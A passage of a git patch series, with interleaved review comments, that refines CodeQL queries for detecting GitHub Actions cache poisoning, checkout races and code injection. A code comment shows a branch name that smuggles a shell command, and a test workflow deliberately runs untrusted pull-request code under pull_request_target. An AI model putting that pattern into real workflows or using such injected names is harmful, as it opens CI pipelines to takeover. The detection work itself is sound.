@@ -30,18 +31,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + not e.getAPropertyValue("branches-ignore") = default_branch_name or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name ) ) ) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f9f983be693..ca4a46b25d0 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -1,4 +1,10 @@ extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: repositoryDataModel + data: [ + - ["public", "main"] + ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index 692d1eb706b..b3dc9185ec4 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql 
@@ -2,7 +2,7 @@ import actions import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions from - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner -where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) -select visibility, path, job, secrets_source, permissions, runner +where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +select trigger, path, job, secrets_source, permissions, runner From f38af29f80f24ece46242b1c29d26ccd3d3fce55 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:36:18 +0000 Subject: [PATCH 0280/1267] Fix array --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index ca4a46b25d0..2293080d93e 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,9 +2,8 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: [ + data: - ["public", "main"] - ] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From cae29e0abe34af10186565c751a4a3c5affb4dd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:03:17 +0000 Subject: [PATCH 0281/1267] temporary fix --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index df2e1db3bdd..b60eb7da761 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -1,4 +1,5 @@ import actions +import codeql.actions.dataflow.ExternalFlow string defaultBranchTriggerEvent() { result = From a2503dd14b8bf028a6f28fb3c4bc6d9355441f7c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 10:22:40 +0000 Subject: [PATCH 0282/1267] fix default_branch_name visibility --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++---------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index b60eb7da761..69590a4a0de 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -15,35 +15,35 @@ predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and - ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" - or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name - or - e.getName() = "pull_request_target" and + repositoryDataModel(_, default_branch_name) and ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and + e.getName() = "push" and e.getAPropertyValue("branches") = default_branch_name or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = default_branch_name + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = default_branch_name and + not e.getAPropertyValue("branches-ignore") = default_branch_name + ) ) ) ) 
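Review bot: Moving the whole disjunction inside `exists(string default_branch_name | repositoryDataModel(_, default_branch_name) and ( ... ))` makes every case depend on a `repositoryDataModel` row. That includes `e.getName() = defaultBranchTriggerEvent()` and the unfiltered `pull_request_target` case, neither of which reads the branch name. When the extension supplies no row, `runsOnDefaultBranch` holds for no job and the cache-poisoning check reports nothing, with no indication why. I would keep the two branch-independent cases outside the quantifier and wrap only the comparisons against `default_branch_name`, or fall back to the former `["main", "master"]` names when no row exists.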
From 1a4939a13ba37ccd1d6dac0a8bc6af63c8c28888 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 16:19:58 +0200 Subject: [PATCH 0283/1267] Apply suggestions from code review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/lib/ext/workflow-models/workflow-models.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 2293080d93e..f71f2081c8f 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -2,8 +2,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all extensible: repositoryDataModel - data: - - ["public", "main"] + data: [] - addsTo: pack: githubsecuritylab/actions-all extensible: workflowDataModel From 11edff936b2a66da31ae278b9f9efe6104c0d62f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:27:59 +0000 Subject: [PATCH 0284/1267] Fix tests --- .../actions/security/CachePoisoningQuery.qll | 63 +++++++++++-------- 1 file changed, 36 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 69590a4a0de..d2a5909206e 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -11,39 +11,48 @@ string defaultBranchTriggerEvent() { ] } +string defaultBranchNames() { + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = default_branch_name + ) + or + not exist(string default_branch_name | + repositoryDataModel(_, default_branch_name) and + result = ["main", "master"] + ) +} + predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") or - e.getName() = "push" and - e.getAPropertyValue("branches") = default_branch_name + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = default_branch_name - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = default_branch_name and - not e.getAPropertyValue("branches-ignore") = default_branch_name - ) + // only branches filter + e.hasProperty("branches") and + not 
e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 17a6d28e18db8b8c61e0ce9275570fc91e18e1f8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:17 +0000 Subject: [PATCH 0285/1267] Fix OR --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index d2a5909206e..3cb84561b54 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -18,9 +18,9 @@ string defaultBranchNames() { ) or not exist(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = ["main", "master"] - ) + repositoryDataModel(_, default_branch_name) + ) and + result = ["main", "master"] } predicate runsOnDefaultBranch(Job j) { From 00052d1ea117af39d03fce6c71d3273421982277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 15:37:57 +0000 Subject: [PATCH 0286/1267] exists --- ql/lib/codeql/actions/security/CachePoisoningQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 3cb84561b54..318548859b5 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
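Review bot: The `branches` and `branches-ignore` comparisons in `runsOnDefaultBranch` test exact equality with `defaultBranchNames()`, but GitHub Actions treats these filter entries as glob patterns. A workflow filtered with `branches: ['**']` or `ma*` therefore runs on the default branch without being matched, and a `branches-ignore` pattern that covers the default branch is not recognised either. I would at least record the limit where the comparisons start, `// NOTE: exact match only; glob patterns in branches / branches-ignore are not evaluated`, or translate the pattern to a regular expression before comparing. Separately, the first disjunct of `defaultBranchNames()` can be written as `repositoryDataModel(_, result)`. The predicate's closing brace falls outside the hunk.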
@@ -17,7 +17,7 @@ string defaultBranchNames() { result = default_branch_name ) or - not exist(string default_branch_name | + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name) ) and result = ["main", "master"] From 6f87b755045f4b4121a3700efb11246a4081e540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 17:44:16 +0200 Subject: [PATCH 0287/1267] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8b14b75062a..96fd8bdd1a4 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,6 +1,8 @@ name: Tests on: push: + branches: + - master pull_request: workflow_dispatch: From 731889bf88bde11f09ecf4039982cddf6cfc04ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 21:29:51 +0200 Subject: [PATCH 0288/1267] Bump qlpack versions --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 5 +++-- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 3047ba35b06..03b6c87405e 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -38,8 +38,9 @@ predicate staticallyIdentifiedSelfHostedRunner(Job job) { */ predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and + repositoryDataModel("public", _) and + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), _, + job.getId(), _, _, runner_info) and runner_info.indexOf("self-hosted:true") > 0 ) } 
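Review bot: The retained test `runner_info.indexOf("self-hosted:true") > 0` in `dynamicallyIdentifiedSelfHostedRunner` holds only when the marker is found at an offset greater than zero, so a `runner_info` value that begins with `self-hosted:true` is not recognised. Whether that can occur depends on how the model rows are generated, which is not visible here; `runner_info.matches("%self-hosted:true%")` states the intent without depending on position. Now that visibility is read from `repositoryDataModel("public", _)`, the QLDoc above the predicate (its opening is outside the hunk) should also say that nothing is reported when no repository row is supplied.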
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 54748d6fd62..7413744d3ff 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.24 +version: 0.0.25 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1b8d7e64028..6bb27759f06 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.24 +version: 0.0.25 groups: - actions - queries From 446765bcbb4fc89d459d805cd2b97f2c17072c7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 15 May 2024 22:08:03 +0200 Subject: [PATCH 0289/1267] Update Cache Poisoning rule --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 11da318f474..0250d9aada1 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,11 +18,10 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // Excluding privileged workflows since they can be easily exploited in similar circumstances - not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request + // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and ( // The job writes to the cache 
@@ -33,7 +32,9 @@ where // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and - s instanceof PoisonableStep + s instanceof PoisonableStep and + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, s.toString() From 888b9fecca8c9c3c1ee450139e7d19886906d26d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 0290/1267] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc..a3fcc9e0403 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d..562fc0809b7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
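Review bot: After the move, `not j.isPrivileged()` is the last conjunct of the "executes checked-out code" branch, and its scope relies on `and` binding tighter than the `or` that presumably precedes this branch (the start of the parenthesised condition is outside the hunk). Privileged jobs are therefore excluded on this path only and are now reported on the cache-write path, which the comment does not say. I would wrap the branch in its own parentheses and reword the comment, e.g. `// On this path only: privileged jobs running checked-out code are excluded here (assumed to be covered by other queries)`.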
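Review bot: Typing `check` as `LabelControlCheck` drops every other `ControlCheck` subclass from this query, not only the actor and association gates named in the commit title; the same edit is made in `UntrustedCheckoutTOCTOUHigh.ql`. The subclass list is not visible here, so any remaining gate whose outcome can change between evaluation and checkout would silently stop being reported. A short comment above the `from` clause would keep the reasoning with the code, e.g. `// Only label gates are treated as racy here; actor/association gates are excluded on purpose`. The `where` clause continues outside the hunk.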
@@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From c47fdd123d8db73c51ce9b3802daca1a06a3f43c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 0291/1267] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 00000000000..1debaecf97d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 1b4246e7f18fc947c67810f7370786bc7cf274ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 11:32:21 +0200 Subject: [PATCH 0292/1267] Update tests for cache poisoning --- ql/test/query-tests/Security/CWE-349/CachePoisoning.expected | 1 + 1 file changed, 1 insertion(+) 
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index f0ee6d70001..6bef24d86d7 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,5 +6,6 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From f325d40a2274d883986bef4c2ab8dff2a1943538 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 15:55:12 +0200 Subject: [PATCH 0293/1267] Ensure event sources are available for triggering events --- .../codeql/actions/dataflow/ExternalFlow.qll | 33 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 63 ++++++++++++++++--- .../internal/ExternalFlowExtensions.qll | 18 ++++-- .../ext/workflow-models/workflow-models.yml | 48 ++++++++++++++ .../.github/workflows/pull_request_target.yml | 5 +- .../CWE-094/.github/workflows/self_needs.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 8 +-- .../CWE-094/PrivilegedCodeInjection.expected | 13 ++-- .../Security/CWE-094/action1/action.yml | 14 ----- 9 files changed, 154 insertions(+), 50 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-094/action1/action.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index f10a90ee6ee..a52cc427d35 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -2,19 +2,42 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +/** + * MaD models for workflow details + * Fields: + * - path: Path to the workflow file + * - trigger: Trigger for the workflow + * - job: Job name + * - secrets_source: Source of secrets + * - permissions: Permissions for the workflow + * - runner: Runner info for the workflow + */ predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) } -predicate repositoryDataModel( - string visibility, string default_branch_name -) { +/** + * MaD models for repository details + * Fields: + * - visibility: Visibility of the repository + * - default_branch_name: Default branch name + */ +predicate repositoryDataModel(string visibility, string default_branch_name) { Extensions::repositoryDataModel(visibility, default_branch_name) } +/** + * MaD models for context/trigger mapping + * Fields: + * - trigger: Trigger for the workflow + * - context_prefix: Prefix for the context + */ +predicate contextTriggerDataModel(string trigger, string context_prefix) { + Extensions::contextTriggerDataModel(trigger, context_prefix) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 08717c33787..063a3f671a3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -95,8 +95,7 @@ private predicate branchEvent(string context) { // - They cannot contain a \ // eg: zzz";echo${IFS}"hello";# would be a valid branch name "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", - "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "github\\.event\\.merge_group\\.head_ref", ] @@ -165,7 +164,8 @@ private predicate pathEvent(string context) { reg = [ // filename - "github\\.event\\.workflow\\.path", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
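Review bot: The pattern `github\\.event\\.workflow_run\\.referenced_workflows\\.path` added to `pathEvent` has no index segment, whereas the array-valued field in `branchEvent` a few lines up is written as `pull_requests\\[[0-9]+\\]\\.head\\.ref`. If `referenced_workflows` is an array in the `workflow_run` payload (it appears to be), an indexed expression would not match unless `Utils::normalizeExpr` strips indices, which is not visible here, and the source would be missed. Consider `"github\\.event\\.workflow_run\\.referenced_workflows\\[[0-9]+\\]\\.path"`. The predicate starts and ends outside the hunk.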
@@ -197,11 +197,33 @@ private predicate jsonEvent(string context) { ) } -class EventSource extends RemoteFlowSource { +class GitHubSource extends RemoteFlowSource { string flag; - EventSource() { - exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + GitHubSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + Utils::normalizeExpr(context) = "github.head_ref" and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + flag = "branch" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventSource extends RemoteFlowSource { + string flag; + + GitHubEventSource() { + exists(Expression e, string context, string context_prefix | + this.asExpr() = e and + context = e.getExpression() and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + | titleEvent(context) and flag = "title" or urlEvent(context) and flag = "url" 
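Review bot: Both new classes obtain the trigger through `e.getEnclosingWorkflow().getATriggerEvent()`, so an expression without an enclosing workflow can no longer be a source. The same commit deletes `action1/action.yml` and its rows in both `.expected` files, which suggests composite actions have dropped out of the code-injection results. If that is intended it deserves a QLDoc line on `GitHubEventSource`, e.g. `/** Only expressions inside a workflow whose trigger is modelled in contextTriggerDataModel are sources; composite actions are not covered. */`; otherwise a fallback disjunct for expressions outside a workflow is needed. The body of `GitHubEventSource` continues outside the hunk.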
@@ -217,8 +239,33 @@ class EventSource extends RemoteFlowSource { usernameEvent(context) and flag = "username" or pathEvent(context) and flag = "filename" - or - jsonEvent(context) and flag = "json" + ) + } + + override string getSourceType() { result = flag } +} + +class GitHubEventJsonSource extends RemoteFlowSource { + string flag; + + GitHubEventJsonSource() { + exists(Expression e, string context | + this.asExpr() = e and + context = e.getExpression() and + ( + jsonEvent(context) and + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + ) + ) and + flag = "json" ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 34f0297d799..415c02dc1ba 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll 
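Review bot: In `GitHubEventJsonSource` the fallback pattern `".*\\bgithub.event\\b.*"` leaves the dot unescaped, so it accepts any character between `github` and `event`, while the other patterns in this file escape it (`github\\.event\\.workflow\\.path`). Suggest `Utils::normalizeExpr(context).regexpMatch(".*\\bgithub\\.event\\b.*")`. The wildcard in `contextTriggerDataModel(..., _)` on that branch also means any modelled trigger enables the whole-event match, which is worth a one-line comment if intended.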
@@ -23,11 +23,19 @@ extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); +/** + * Holds if workflow data model exists for the given parameters. + */ extensible predicate workflowDataModel( - string path, string trigger, string job, string secrets_source, string permissions, - string runner + string path, string trigger, string job, string secrets_source, string permissions, string runner ); -extensible predicate repositoryDataModel( - string visibility, string default_branch_name -); +/** + * Holds if repository data model exists for the given parameters. + */ +extensible predicate repositoryDataModel(string visibility, string default_branch_name); + +/** + * Holds if context/trigger mapping exists for the given parameters. + */ +extensible predicate contextTriggerDataModel(string trigger, string context_prefix); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index f71f2081c8f..404e894a5f8 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml 
